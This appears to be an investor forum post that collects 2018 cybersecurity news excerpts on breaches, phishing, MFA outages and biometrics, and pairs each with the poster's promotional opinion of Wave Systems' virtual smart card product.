Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Manufacturers Remain Slow to Recognize Cybersecurity Risk
https://www.nytimes.com/2018/11/21/business/manufacturers-remain-slow-to-recognize-cybersecurity-risk.html
Excerpt near the end of article -
Another approach is to adopt something called whitelisting. For years, Mr. Patel said, most companies had software that excluded known viruses, essentially blacklisting potential problems. But that was too reactive and sometimes exposed systems to unknown attackers. Now, he said, the better approach is to whitelist — that is specify approved software applications that are permitted to be active on a computer system. “It’s increasingly become one of the most important types of defenses.”
=================================================================
Wave Endpoint Monitor uses whitelisting to protect computer systems and is one of the advantages over traditional antivirus.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpt:
By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately
PI System Software Maker, OSIsoft, Announced Breach
https://www.infosecurity-magazine.com/news/pi-system-software-maker-osisoft?utm_source=twitterfeed&utm_medium=twitter
A self-proclaimed leader in enabling operational intelligence, OSIsoft, maker of PI system software, announced an ongoing investigation into a data breach that likely compromised all domain accounts.
On 16 November, the company reported that it was experiencing a security incident that potentially affected everyone from employees and interns to consultants and contractors. Attackers reportedly stole credentials and used them to access the OSIsoft computers, which resulted in alerts of unauthorized activity from the intrusion detection systems.
“Our security service provider has recovered direct evidence of credential theft activity involving 29 computers and 135 accounts. We have concluded, however, that all OSI domain accounts are affected,” the data breach notification warned.
Additionally, the company advised, “You should assume your OSI domain logon account name, as well as email address and password have been compromised.”
The incident remains under investigation with the company’s security service providers, and OSIsoft reported that it “has developed a comprehensive remediation strategy that includes a contingency plan, in case there is an escalation of unauthorized activity as the investigation continues.”
The company also advised that users reset external accounts to use different passwords.
“While most organizations factor vendors, suppliers and contractors into their third-party risk management programs, the reality is that our digital ecosystems are a lot bigger than that. Any third party in a company’s digital ecosystem can be the weak link that gives attackers a clear path to exposed data,” said Fred Kneip, CEO, CyberGRX.
“In this case, OSIsoft’s security controls weren’t able to stop a case of credential theft, affecting a confirmed 135 accounts and possibly more. With over 65% of Fortune 500 industrial companies using their product, OSIsoft is a major gateway to valuable data and they should be seen as such. Large companies like these often interact with tens of thousands of third parties, and it’s critical for them to gain a better understanding of which of those third parties pose the biggest risk to their data.”
=================================================================
In this case and in many cases 'security controls' and/or intrusion detection systems would be less effective than ERAS, Wave VSC 2.0. When using ERAS, VSC 2.0 the unauthorized party or activity would not have been allowed on the network. (see ERAS below) This use case shows how beneficial ERAS, Wave VSC 2.0 could be for a lot of companies. imo.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs
In a post-EMV world, fraud is shifting from in-person to ecommerce channels
https://www.helpnetsecurity.com/2018/11/19/fraud-concern-merchants/
Three years after the switch to new chip-based credit and debit cards, a study by the National Retail Federation and Forrester says payment card fraud is still a top concern for large U.S. retailers as criminals move their activities online.
“The implementation of EMV chip cards and chip card readers was supposed to dramatically reduce credit and debit card fraud,” the State of Retail Payments report said. “So why is fraud still the top concern for merchants?”
The report found that fraud was the top payment-related challenge faced by retailers, cited by 55 percent of those surveyed. The reason is largely that Europay-MasterCard-Visa chip cards have moved payment card fraud away from stores and toward online transactions, the report said, citing a Forter study showing a 13 percent increase in online fraud last year. A Federal Reserve study said online fraud rose from $3.4 billion in 2015 – the first year retailers were required to accept chip cards or face an increase in fraud liability – to $4.6 billion in 2016 and was an “increasing concern.”
“In a post-EMV world, fraud is shifting from in-person to ecommerce channels, so retailers have been busy bolstering their defenses to mitigate the increasing costs and risks of ecommerce fraud,” the report said.
To help fight fraud, the report found that retailers want better authentication of purchases no matter where they take place and that 33 percent have implemented 3-D Secure, a system marketed as Verified by Visa or MasterCard SecureCode that is intended to help authenticate online purchases.
For in-person purchases, 51 percent of merchants said biometrics would be the best way to verify transactions, and 53 percent expressed interest in implementing forms such as the fingerprint and facial recognition available on smartphones. But with that technology limited to phones rather than cards, 46 percent said personal identification numbers would be the best currently available way to approve card transactions.
For purchases made with cards, 95 percent of retailers said requiring PINs would improve security and 92 percent would implement it if it were available. While EMV cards in other countries are chip-and-PIN, virtually all EMV credit cards issued by U.S. banks have been chip-and-signature with PIN available only on debit cards. And the major credit card companies stopped requiring a signature last year.
“The chip in an EMV card makes it very difficult to counterfeit the card, but it does nothing to show whether the person trying to use the card is the legitimate cardholder,” NRF Senior Vice President and General Counsel Stephanie Martz said. “If we want to stop card fraud, we need a better way of authenticating users and it should be one that’s affordable, easy and safe. Someday the answer might be biometrics or technology that has yet to be invented but, in the meantime, we know PIN can stop criminals dead in their tracks. With no signatures, no PIN and no biometrics, what we have right now is no authentication at all.”
NRF has long argued that PIN is important because the chip in EMV cards only prevents the use of counterfeit cards while not stopping lost or stolen cards, and a PIN can also provide a backup for cases where the chip malfunctions or is tampered with.
In addition to the focus on cards, retailers have also been installing technology to fight data breaches and thereby keep criminals from stealing card data that can then be used to commit fraud. The report found 89 percent expect to have tokenization in place by the end of next year, and that 80 percent plan to do the same with point-to-point encryption.
The second-biggest concern was the cost of accepting payment cards, including the swipe fees banks charge to process transactions, cited by 45 percent. While the survey found 49 percent of retailers have taken advantage of routing options required as part of a cap on debit card swipe fees passed by Congress in 2010, rising swipe fees for credit cards remain the subject of litigation between retailers and the card industry. Chargebacks of disputed purchases, which increased after implementation of EMV for some retailers, were the third-biggest concern, cited by 35 percent.
“Eliminating fraud and improving authentication are clearly top priorities for retailers,” Brendan Miller, principal analyst at Forrester, said. “As the answers to these challenges are found, the key will be finding ways to implement the solutions in a way that provides a frictionless experience for consumers.”
=================================================================
Wave and Bell ID Partner to Combat Online Payment Fraud
card-present transactions enabled for E-Commerce by integrating TPM technology
https://www.wavesys.com/buzz/pr/wave-and-bell-id-partner-combat-online-payment-fraud
Lee, MA -
July 31, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) announced it is partnering with chip lifecycle management solutions company, Bell ID, to offer a joint solution aimed at reducing online payment fraud. The solution will be marketed primarily to card issuing banks, as well as online merchants, governments, and enterprises worldwide.
Using Bell ID’s Trusted Service Manager and Secure Element in The Cloud (SEiTC) server, alongside Wave’s ERAS for TPM management and Wave’s endpoint identity and monitoring expertise, the combined offering provides robust protection for transactions and stored payments. The companies have executed a letter of intent and anticipate the signing of a definitive agreement in August.
The incident rate of card-not-present (CNP) fraud has been growing steadily over the past several years. According to a recent FICO Banking Analytics Blog, CNP fraud now accounts for close to half of all credit card fraud. Countries that have already adopted the EMV® card specification have seen CNP fraud rates increase. In the United States, CNP fraud is expected to rise significantly over the next eighteen months, as the EMV standard is put into effect. The EMV directive, which implements a global standard for a secure chip-based payment application, will make merchants liable for any fraud resulting from transactions on systems that are not EMV-capable.
“Wave’s robust product portfolio is very complementary to Bell ID’s strongly positioned solution set in the financial services market,” said Bill Solms, CEO, Wave Systems. “We see the EMV transition creating high demand for more secure transaction capabilities, and are confident that together we can provide financial institutions with a comprehensive solution for payment authorization and storage.”
“Bell ID has been a pioneer in developing and delivering cloud-based payment platforms,” adds Pat Curran, Executive Chairman at Bell ID. “We also have extensive experience in delivering EMV solutions globally and have witnessed fraud transition online as point-of-sale terminals in face-to-face transactions become more secure. We are therefore delighted to extend our offering with Wave to provide a secure online transaction and storage payment solution, which will mitigate against an expected rise in online fraud and provide a trusted link between device identity and internet services.”
Phishers Up Their Game to Combat User Awareness
https://www.infosecurity-magazine.com/news/phishers-up-game-to-combat-user?utm_source=twitterfeed&utm_medium=twitter
In an attempt to undermine the security industry’s effort to educate end users about phishing campaigns, malicious actors are evolving in their tactics, according to Zscaler.
In a recent blog published by Zscaler Threat LabZ, Deepen Desai and Rohit Hegde detailed findings of new research into phishing activities. According to the findings, Microsoft, Facebook and PayPal are the top brands that are being targeted by phishing campaigns.
The top five sector categories that are most commonly targeted are communications (41.4%), social media (18.3%), finance (16.7%), travel (12.4%) and dating (3.4%).
“In addition to the known brands, it was interesting to see phishing campaigns targeting Travel Visa portals (Canadian Visa and Australian Visa, for example) included in our top five most targeted brands. The attackers in this case were most likely interested in phishing for sensitive immigration information, such as passport details, date of birth and national identification numbers,” Desai and Hedge wrote.
Notably one of the best tools in a hacker’s toolbox, phishing is a successful tactic long used by attackers who are looking to steal personally identifiable information, such as Social Security numbers, credit card details, date of birth, and other sensitive data.
Wrote the authors, “About 65% of all phishing content we’ve seen in the past three months was over HTTP and the remaining 35% was over HTTPS. This represents a 300% increase in phishing content being delivered over HTTPS since 2016.”
Because the security industry has been diligent in its efforts to raise awareness, putting great effort into educating users how to identify phishing sites, cybercriminals have reportedly had to up their game. The attackers have had to get creative in order to trick better-informed users, and they are reportedly now carefully designing sites to look identical to the popular brands they are imitating.
"As the end users become more vigilant against clicking suspicious links, attackers have also upped the ante by evolving the way in which the phishing content is being delivered as well as tactics being leveraged to make the phishing pages stay undetected for longer period," they wrote.
=================================================================
Given this new information, educating users on phishing could be even less effective than using Wave VSC 2.0 (2FA). The phished password would not have an effect on the login since the login is a PIN and even if the PIN was somehow phished the hacker would need the user's computer (TPM). The newer phishing site designs and the less effectiveness of user education creates another great selling point for Wave VSC 2.0!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
Cybersecurity Is a Top Concern for Healthcare Executives
https://futurism.com/the-byte/cybersecurity-healthcare-executives
Priority Numero Uno
Cybersecurity isn’t just a top technology concern of today’s healthcare executives — it’s the top concern.
That’s according to “Top of Mind for Top Health Systems 2019,” a new report co-authored by the Center for Connected Medicine (CCM), a think tank focused on the use of technology in healthcare, and the Health Management Academy, a network of healthcare executives.
Weak Link
To produce this report, the CCM and the Academy surveyed and interviewed 44 executives from 38 health systems representing 459 hospitals across the U.S.
According to those executives, the most common types of cyberattacks their institutions had faced in the previous 12 months were phishing and spear-phishing. Both of those involve gaining access to a network by essentially tricking a person into handing over valuable information, such as passwords and usernames, and they can enable a hacker to access sensitive information about patients.
It’s not entirely surprising, then, that 62 percent of those who contributed their insights to the report believe staff members are the primary point of weakness in their institutions’ cybersecurity. “Employee education” was also cited as the most common cybersecurity challenge, implying it’s a weak spot that hasn’t been easy to address.
Shoring Up
Thankfully, hospitals appear prepared to meet the challenge of cybersecurity head on. Not one of the respondents claimed their health system planned to decrease spending on cybersecurity efforts in 2019. In fact, 87 percent said they planned to spend more than they did in 2018.
“The people that are up to no good have far better tools than we do on our platforms,” one CEO told the report’s creators. “If they really target you, they will likely find a way in…We are not trying to make it impenetrable, but we are trying to make it more difficult to break into our system than others in our market.”
=================================================================
Rather than focusing on phishing education to prevent cyber attacks, the focus should be on using 2FA like Wave VSC 2.0 as a more foolproof way to protect Healthcare (and other companies as well) companies from cyber attacks. imo. Taking the human factor (education of employees) out of the the cybersecurity equation is a great selling point for Wave VSC 2.0!!
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
Low TCO
• Reduce operating expenses by eliminating password reset and shortening deployment times
• Minimize capital expenses by using hardware you already have
• Integrate with Microsoft Active Directory for IT familiarity
Superior User Experience
• No more tokens or smart cards to achieve two-factor authentication
• Eliminate VPN/WiFi/website passwords for faster access to resources
• No add-on software means improved OS performance
Flexibility
• Compatible with Windows 8.1, 8, 7 and Vista operating systems – manage mixed environments from one console
• Create custom management policies to suit your organization’s needs
• User and device authentication from a common console
Seamless Device Authentication
• Access control over wireless (i.e. 802.1x)
• Single sign-on
• VPN authentication (i.e. Microsoft DirectAccess)
LastPass? More like lost pass. Or where the fsck has it gone pass. Five-hour outage drives netizens bonkers
https://www.theregister.co.uk/2018/11/20/fivehour_outage_frustrates_lastpass_punters/
LastPass's cloud service suffered a five-hour outage today that left some people unable to use the password manager to log into their internet accounts.
Its makers said offline mode wasn't affected – and that only its cloud-based password storage fell offline – although some Twitter folks disagreed. One claimed to be unable to log into any accounts whether in “local or remote” mode of the password manager, while another couldn't access their local vault.
The solution, apparently, was to disconnect from the network. That forced LastPass to use account passwords cached on the local machine, rather than pull down credentials from its cloud-hosted password vaults. Folks store login details remotely using LastPass so they can be used and synchronized across multiple devices, backed up in the cloud, shared securely with colleagues, and so on.
The problems first emerged at 1408 UTC on November 20, with netizens reporting an “intermittent connectivity issue” when trying to use LastPass to fill in their passwords to log into their internet accounts. Unlucky punters were, therefore, unable to get into their accounts because LastPass couldn't cough up the necessary passwords from its cloud.
The software's net admins worked fast, according to the organisation's status page. Within seven minutes of trouble, the outfit posted: “The Network Operations Center have identified the issue and are working to resolve the issue.”
The biz also reassured users that there was no security vulnerability, exploit, nor hack attack involved:
Connectivity is a recurrent theme in LastPass outages: in May, LogMeIn, the developers behind LastPass, suffered a DNS error in the UK that locked Blighty out of the service.
The service returned at nearly 2000 UTC today, when the status team posted: “We have confirmed that internal tests are working fine and LastPass is operational. We are continuing to monitor the situation to ensure there are no further issues.”
=================================================================
The use of Wave VSC 2.0 imo could prevent situations like the one faced by LastPass customers in the article above. Wave VSC 2.0 is similar in certain ways (in its aim) to LastPass but with better security. Wave VSC 2.0 not being susceptible to a situation like this is a great selling point for Wave. imo.
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Decrease expenses with virtual smart cards
You know what else happens when you take passwords out of the equation? A lot fewer calls to IT. Imagine if you took password resets out of the picture – that frees up a chunk of IT time, lowering your operating expenses significantly.
If your organization currently uses traditional tokens or smart cards, switching to virtual smart cards takes an even bigger burden off of IT – we use the hardware-protected credentials in the TPM to create a virtual smart card, which performs the same functionality as traditional smart cards. That means no need to purchase, deploy, replace or maintain external tokens, smart cards or smart card readers. Because virtual smart cards are already on your machines and can’t be forgotten, lost or stolen, you have lower capital expenses and lower operating expenses.
Wave's is the only management to support virtual smart cards on Windows 7, as well as Windows 8 and 8.1.
Microsoft confirms: We fixed Azure by turning it off and on again. PS: Office 362 is still borked
https://www.theregister.co.uk/2018/11/19/microsoft_azure_office_outage_latest/
Redmond battles TITSUP multi-factor auth logins (yes, that's Total Inability To Support Users' Passcodes)
Microsoft is recovering somewhat from a bad case of the Mondays that left some of its subscribers unable to use multi-factor authentication to log into their cloud services.
The Redmond giant said that around 2130 UTC today it had managed to get its Azure Cloud back up and running as per normal. Meanwhile, Office 364 is still being knocked into shape by the Windows giant's techies.
Azure and the cloud-based Office suite started playing up at 0439 UTC, meaning multi-factor authentication has been knackered for about 17 hours, preventing unlucky users from logging in.
Cycle-pathic
In the case of Azure, the fix seemed relatively straightforward, if not cliche. Microsoft turned their computers off and on again, according to the cloud platform's status page at time of writing:
Engineers cycling of impacted servers is complete and initial telemetry and customer reports indicates issue is majority mitigated. telemetry will continue until mitigation confirmed. Engineers will continue to monitor any updates or changes made from the work-streams currently being explored.
Just as we were publishing this story, we noticed Microsoft had quietly revised its explanation of the Azure cock-up: it now blames an overloaded Redis database in Europe that ultimately took out other systems when it tried to fail over to equipment in North America. A hotfix was applied, and machines were rebooted, to revive the platform's multi-factor authentication systems, as the status page now explains:
Preliminary root cause: Requests from MFA servers to Redis Cache in Europe reached operational threshold causing latency and timeouts. After attempting to fail over traffic to North America this caused a secondary issue where servers became unhealthy and traffic was throttled to handle increased demand.
Mitigation: Engineers deployed a hotfix which eliminated the connection between Azure Identity Multi-Factor Authentication Service and a backend service. Secondly engineers cycled impacted servers which allowed authentication requests to succeed.
In a way, Microsoft is saying its cloud couldn't handle the weight of multi-factor login requests. Given the multi-factor tokens are only valid for a short time – there's typically a 60-second window to enter the correct code – high latency becomes a real problem.
As for Office 363-and-a-half, the fix does not appear to be so straightforward. Redmond said that it is still working on the problem, and as of right now engineers aren't even sure just what went wrong.
"Due to the complex nature of this problem, our investigation into the root cause of this issue may take an extended period of time," Microsoft told customers. "This incident is and will remain our highest priority until the underlying source of the problem has been identified."
This is after many, but not all, punters have spent most of the day unable to log-in to their Microsoft-hosted services via multi-factor authentication. The outages were felt worldwide, beginning in the afternoon of Monday in Asia, and carrying on into Europe's start-of-the-week, and into the Americas as unlucky users found themselves unable to use their two-factor gizmos to log in.
For security reasons, multi-factor authentication is highly recommended in order to prevent password-stealing hackers from hijacking accounts.
Now, with Asia nearly ready to get up and start its Tuesday workday, Microsoft has yet to fully resolve its Office 359 login headaches. Passwords also cannot be reset by users.
If there is one saving grace for Redmond, it is that thanks to the impending Thanksgiving holiday combined with severe weather on the US East Coast and wildfire-induced pollution in California, a good number of Americans are working from home on Monday, potentially limiting frustrations stemming from the outages: it's quite easy to go back to bed if you can't even log in.
=================================================================
Since Wave VSC 2.0 doesn't use SMS for multi-factor authentication, it is highly conceivable that this problem in the article wouldn't have happened if the user had Wave VSC 2.0!- A great selling point for Wave VSC 2.0! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
2FA Login Failure in Office 365 and Azure
https://www.infosecurity-magazine.com/news/2fa-login-failure-in-office-365?utm_source=twitterfeed&utm_medium=twitter
According to tweets from Microsoft, the company is investigating reports that Azure and Office 365 are again suffering issues that are leaving users unable to login using multifactor authentication (MFA). When users enter their login credentials and are sent an SMS with a two-factor authentication (2FA) code, the screen does not advance for the user to enter the code, according to a Reddit discussion.
Azure Support also tweeted, “Engineers are actively investigating an ongoing issue affecting Azure Active Directory, when Multi-Factor Authentication is required by policy.”
News of the issue comes less than a month after a reported login problem that left many admins and users unable to access their accounts for several hours. This latest issue is affecting global users, including people from Norway, Australia and the United States expressing frustrations via social media sites.
The most recent status update from Azure as of publication time stated: “Starting at 04:39 UTC on 19 Nov 2018 customers in Europe and Asia-Pacific regions may experience difficulties signing into Azure resources, such as Azure Active Directory, when Multi-Factor Authentication is required by policy.
“Engineers have deployed the hotfix which eliminated a connection between Azure Identity Multi-Factor Authentication Service and a backend service. The deployment of this Hotfix took some time to take effect across the impacted regions. We are seeing a reduction in errors, and customers may be seeing signs of recovery and authentications are succeeding.”
Since the hotfix has been deployed, engineers are continuing to monitor the ongoing performance and will provide updates as necessary.
“Another day, another Office 365 disruption, and another nuisance for admins and employees alike. With less than a month between disruptions, incidents like today’s Azure multifactor authentication issue pose serious productivity risks for those sticking to a software-as-a-service monoculture,” said Pete Banham, cyber resilience expert at Mimecast.
“With huge operational dependency on the Microsoft environment, no organisation should trust a single cloud supplier without an independent cyber resilience-and-continuity plan to keep connected and productive during unplanned, and planned, email outages. Every minute of an email outage could costs businesses hundreds and thousands of pounds. Without the ability to securely log in, knowledge worker employees are unable to do their jobs. The question is if your work email and productivity are dependent on Office 365, how much have these hours of disruption cost you so far?”
=================================================================
Office 365, Azure Users are Locked Out After A Global Multi-Factor Authentication Outage
https://techcrunch.com/2018/11/19/office-365-azure-users-are-locked-out-after-a-global-multi-factor-authentication-outage/
=================================================================
These articles are more selling points for Wave VSC 2.0 imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases ? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
Biometrics and AI firm team up for first U.S. biometric database amidst criticism
https://www.scmagazine.com/home/security-news/biometrics-and-ai-firm-team-up-for-first-u-s-biometric-database-admist-criticism/
Biometrics firm SureID and AI-startup firm Robbie.AI are teaming up to launch the first U.S. biometric database.
SureID has a nationwide network of fingerprint enrollment kiosks while Robbie.AI uses technology to authenticate using AI-based facial recognition and behavioral prediction that could be combined to create a nationwide biometric databased for consumer focused initiatives, according to a press release.
The technology could be used in retail authentication, employment verification, IDs for keyless automated vehicles and other multiple biometric authentication levels and the companies say they are using the highest security measures to protect their data.
“SureID plans to continue to lead with advanced security threat responses and military-grade security mechanisms designed to thwart bad actors and protect personal and corporate security,” SureID General Manager Ned Hayes told SC Media. “SureID R&D is currently researching technology that could allow individuals to have full control over their biometric data information without concerning themselves with the required backup strategies.”
Furthermore, Hayes said his firm is one of a handful of selected FBI fingerprint channeling partners and that its system provides end-to-end encryption, physical and electronic security measures in a secure cloud infrastructure validated and approved by the FBI and other government agencies.
Karen Marquez, CEO of Robbie.AI, told SC Media that her firm never stores frames from video or photo and only saves biometric cues through coordinates and other custom indicators from the original face in the form of numbers that are stored as a ciphered binary.
“There is no way to link this binary data to personal data or a person identity from our backend because we do not keep the original person link,” Marquez said. “Moreover, even in the event of any attempt of compromising the database, deciphering the binaries into raw descriptors provides hundreds of thousands of floating point numbers.”
Marquez added that there is no way to reverse engineer the numbers into pixels, know who the numbers belong to, or even understand them as they are separated and stored into a different provider and data center.
In addition, Hayes said SureID today only collects data that has been submitted to their system via full consumer knowledge and full consumer participation, for authorized purposes only, and that it collects data and deletes data in full compliance with all government regulations regarding data preservation and deletion.
Despite the assurance, the technology has privacy and cybersecurity experts concerned about the companies’ abilities to protect the data, how the data will be used, and the potential for misuse.
“On one hand, I appreciate the need for rapid identification of people who intend to cause harm and the ability to detect these people quickly in public places,” Chris Morales, head of security analytics at automated threat management solutions firm Vectra, told SC Media. “On the other, it sounds like a huge privacy nightmare as I am very concerned about the misuse or manipulation of a database of biometric authentication at this scale.”
Morales said a national biometric database is almost inevitable since society and governments have been heading towards some form of rapid real time person identification for decades. This started with video security monitoring cameras in most public places around the world, and the addition of machine learning has even made it possible to recognize the way a person walks as a unique identifier.
“I think as a security industry, our best course of action is to work with the national governments to ensure any biometric system is highly secure and has auditing and oversight to ensure the proper use of the biometric data,” Morales added. “This type of data would mean anyone could be found instantly at any time. It could be very scary.”
The technology also causes worry to some considering the backdrop of recent elections where many states’ voter identification procedures are woefully lacking.
“It is a little concerning that some loose affiliation of private companies will have the ability to identify me in public and track me without my consent,” Rick Moy, chief marketing officer at Acalvio, said. “And do who knows what with the data to sustain their business models.”
Other researchers emphasized that despite the protections in place, the data could still potentially be misused even by law enforcement.
“AI and ML algorithms often mirror and amplify the biases of the data collected,” Abhishek Iyer, technical marketing manager at Demisto, said. “If criminal investigations will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources.”
Not everyone was against the technology and some even supported it, Frances Zelazny, BioCatch chief strategy officer, said there is a dire need for a better system in the U.S. to more accurately identify, and verify that people are who they say they are.
“Because there is no central ID system and personal information is widely available on the Internet thanks to the data breaches, the classic KYC process no longer works in the U.S. and in essence,” Zelazny said. “The Internet of Things will only continue to make our world more interconnected, and where we present our identity on one application may mean that several other modes are affected.”
Zelazny added that action is needed from government, private sector and consumer advocate stakeholders who must collaborate on an identity framework that can support trusted online interactions.
=================================================================
These AI-generated fake fingerprints can fool smartphone security
https://www.zdnet.com/article/these-ai-generated-fake-fingerprints-can-fool-smartphone-security/
Attackers no longer need your actual fingerprint to unlock your phone
Researchers have refined a technique to generate fake fingerprints that match multiple people, potentially undermining fingerprint-based access-control systems.
The technique opens up the possibility of fingerprint-based 'dictionary attacks', or the biometric equivalent of throwing a large set of possible passwords at a login page on the chance that one of them is correct.
The researchers from New York University detail in a new paper how they used a neural network to create 'DeepMasterPrints', or realistic synthetic fingerprints that have the same ridges visible when rolling an ink-covered fingertip on paper.
The attack is designed to exploit systems that match only a portion of the fingerprint, like the readers used to control access to many smartphones.
The aim is to generate fingerprint-like images that match multiple identities to spoof one identity in a single attempt.
DeepMasterPrints are an improvement on the MasterPrints the researchers developed last year, which relied on modifying details from already captured fingerprint images used by a fingerprint scanner for matching purposes.
The previous method was able to mimic the images stored in the file, but couldn't create a realistic fingerprint image from scratch.
The researchers tested DeepMasterPrints against the NIST's ink-captured fingerprint dataset and another dataset captured from sensors.
"This work directly shows how to execute this exploit and is able to spoof 23 percent of the subjects in the dataset at a 0.1 percent false match rate. At a one percent false match rate, the generated DeepMasterPrints can spoof 77 percent of the subjects in the dataset," the researchers write.
=================================================================
A-Ha, the better security of a PIN number and the TPM of Wave VSC 2.0 at less than half the cost!! These articles show the potential limitations of biometrics and why imo Wave VSC 2.0 should be at the top of many companies' shopping lists.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
OPM is Still Far Behind on Data Protection Three Years After Devastating Breach
https://www.nextgov.com/cybersecurity/2018/11/opm-still-far-behind-data-protection-three-years-after-devastating-breach/152804/
The agency hasn’t implemented one-third of an auditor’s cybersecurity recommendations.
More than three years after suffering the most devastating cyber breach to date against civilian government networks, the Office of Personnel Management still hasn’t implemented about one-third of the recommendations from the government’s in-house auditor, a Tuesday report found.
Un-implemented recommendations include regularly updating software to the latest version, encrypting passwords and ensuring administrators aren’t sharing account logins, according to the Government Accountability Office report.
In some cases, OPM still hasn’t reset passwords that were used before the breach, the report found.
The OPM breach compromised sensitive security clearance information about more than 20 million current and former federal employees and their families plus a smaller amount of fingerprint data.
Overall, OPM has implemented 51 of the Accountability Office’s 80 recommendations, or about 64 percent. Some of those implemented recommendations include strengthening firewalls, enforcing password policies and updating contingency plans for the especially vital system, the report states.
Of the 29 remaining recommendations, OPM plans to implement 25 before the end of 2018 plus three more before October 2019, the agency’s chief information officer told the Accountability Office.
OPM does not plan to implement a final recommendation focused on putting security controls on contractors’ workstations, the report states. The office believes it has other security controls that compensate for that one, GAO said.
The GAO report comes just days after OPM’s own inspector general found “material weakness” in the agency’s information security program, citing a lack of information technology resources and “the agency’s culture of minimizing the role of the chief information officer.”
The inspector general also noted a “significant deficiency” in OPM’s IT security controls, noting that all the agency’s IT systems had valid security assessments and authorizations but some of those assessments and authorizations included low-quality work and questionable supporting documentation.
A federal appeals court is currently considering whether to reinstate a lawsuit brought by two federal employee unions over OPM’s data breach. That suit was scrapped at the federal district court level when a judge ruled the plaintiffs didn’t have standing to sue because they hadn’t suffered any clear harm.
Chinese government-linked hackers are widely believed responsible for the 2015 OPM breach but U.S. officials have never formally accused the Chinese government of being responsible for the breach. There’s no clear evidence that data stolen in the breach has ever been released on the dark web or used to conduct identity theft.
=================================================================
OPM could be a very happy customer for using Wave VSC 2.0. The product is better security at less than half the cost!! Other agencies within the government could be very happy customers too!
Someone like Bill Solms would need to present the product once again to the government because it seems to be sorely missing from a protection standpoint. imo. The reason I mention Bill Solms or someone like him is due to his government expertise and the article at the end of this post.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
==================================================================
Wave Systems Announces First U.S. Federal Government Customer for Wave Virtual Smart Card 2.0
https://www.wavesys.com/buzz/pr/wave-systems-announces-first-us-federal-government-customer-wave-virtual-smart-card-2.0
Lee, MA -
October 2, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) marked an important sales milestone by announcing the first U.S. federal government customer for its Virtual Smart Card 2.0.
Since the Virtual Smart Card 2.0 became commercially available in late July 2014, Wave has entered into dozens of pilot deployments in multiple sectors, including healthcare, financial services, automotive, energy and utilities. However, today’s announcement marks the product’s first sale in the government sector.
